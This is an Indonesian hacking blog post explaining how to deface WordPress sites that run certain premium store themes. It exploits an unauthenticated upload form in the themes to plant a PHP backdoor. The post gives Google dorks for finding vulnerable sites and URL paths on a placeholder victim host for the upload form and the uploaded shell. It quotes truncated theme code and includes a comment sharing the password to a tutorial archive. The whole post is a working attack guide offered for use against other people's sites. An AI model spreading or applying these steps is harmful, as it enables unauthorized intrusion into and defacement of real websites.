| Filename | Deface wordpress site just 2 minutes |
| Permission | rw-r--r-- |
| Author | Cyberhero 911 |
| Date and Time | 6:37 PM |
| Label | Defacements| exploite| Hacking |
| Action |
hai.. sya mw share cara deface website yang menggunakan cms wordpress dalam jangka waktu yang super singkat, dan disini kita ga perlu melakukan hacking terhadap admin websitenya..
hmm.. pasti bingung yah knpa sya blang bgtu, ok awalnya sya harus mengganti theme website kantor saya yg kebetulan saya jga menggunakan cms wordpress untuk enginenya, iseng-iseng googling akhirnya dapet theme premium yang bagus.. alhasil saya upload deh itu theme dan saya edit-edit sesuka hati saya haha.. trus tiba-tiba mata sya tertuju di salah satu folder yg nama'y upload yg di dalamnya ada file upload.php.
kira-kira bgini lah isi dri file upload.php
WP-2.6
require_once($load);
}
else {
wp_die('Error: Config file not found');
}
global $upload_folder_path;
$today = getdate();
if ($today['month'] == "January"){
$today['month'] = "01";
}
elseif ($today['month'] == "February"){
$today['month'] = "02";
}
elseif ($today['month'] == "March"){
$today['month'] = "03";
}
elseif ($today['month'] == "April"){
$today['month'] = "04";
}
elseif ($today['month'] == "May"){
$today['month'] = "05";
}
elseif ($today['month'] == "June"){
$today['month'] = "06";
}
elseif ($today['month'] == "July"){
$today['month'] = "07";
}
elseif ($today['month'] == "August"){
$today['month'] = "08";
}
elseif ($today['month'] == "September"){
$today['month'] = "09";
}
elseif ($today['month'] == "October"){
$today['month'] = "10";
}
elseif ($today['month'] == "November"){
$today['month'] = "11";
}
elseif ($today['month'] == "December"){
$today['month'] = "12";
}
// Edit upload location here
$imagepath = $General->get_product_imagepath();
if($imagepath == '')
{
$imagepath = 'products_img';
}
//$destination_path = ABSPATH . "wp-content/uploads/".$today['year']."/".$today['month']."/";
$destination_path = ABSPATH . $upload_folder_path.$imagepath."/";
if (!file_exists($destination_path)){
$imagepatharr = explode('/',$upload_folder_path.$imagepath);
$upload_path = ABSPATH . "$imagepath";
if (!file_exists($upload_path)){
mkdir($upload_path, 0777);
}
$year_path = ABSPATH;
for($i=0;$iget_digital_productpath();
if($digital_product_path == '')
{
$digital_product_path = 'digital_products';
}
$digital_destination_path = ABSPATH . "$upload_folder_path".$digital_product_path."/";
$imagepatharr = array();
if (!file_exists($digital_destination_path)){
$imagepatharr = explode('/',$digital_product_path);
$upload_path = ABSPATH . "$upload_folder_path";
if (!file_exists($upload_path)){
mkdir($upload_path, 0777);
}
for($i=0;$i
tapi pas coba buka file upload.php dri browser koq ga muncul apa-apa ywda akhirnya coba iseng buka file index.php yg isinya kya gini..
WP-2.6
require_once($load);
}
else {
wp_die('Error: Config file not found');
}
$action = $_GET['img'];
?>
dan ternyata muncul form untuk upload hehehe.. ywda lanjutkan lgi iseng-isengnya dengan upload file .jpg dan sukses, kenapa ga coba upload file .php ja yah siapa tw bsa jdi BD.. tanpa di duga-duga ternyata berhasil jga.. ywda deh lanjut tanem BD di website-website yang pake theme itu..
untuk dorknya silahkan pake ini..
inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/frameworkold
Untuk path yang ada vulnerabilitynya
http://urvictim.com/wp-content/themes/(vulnerability theme path)/upload/
Ini untuk path file yang tadi di upload
http://urvictim.com/wp-content/uploads/products_img/
Untuk video tutorialnya silahkan klik disini..
Demo
happy hacking all.. :)
2 comments:
password RAR apa y ??
trimksih
maaf baru sempet blz..
password'y : YxkmpJJZbXaIjANCGg0Tyxi0
sesuai dengan nama file zip'y :)
Post a Comment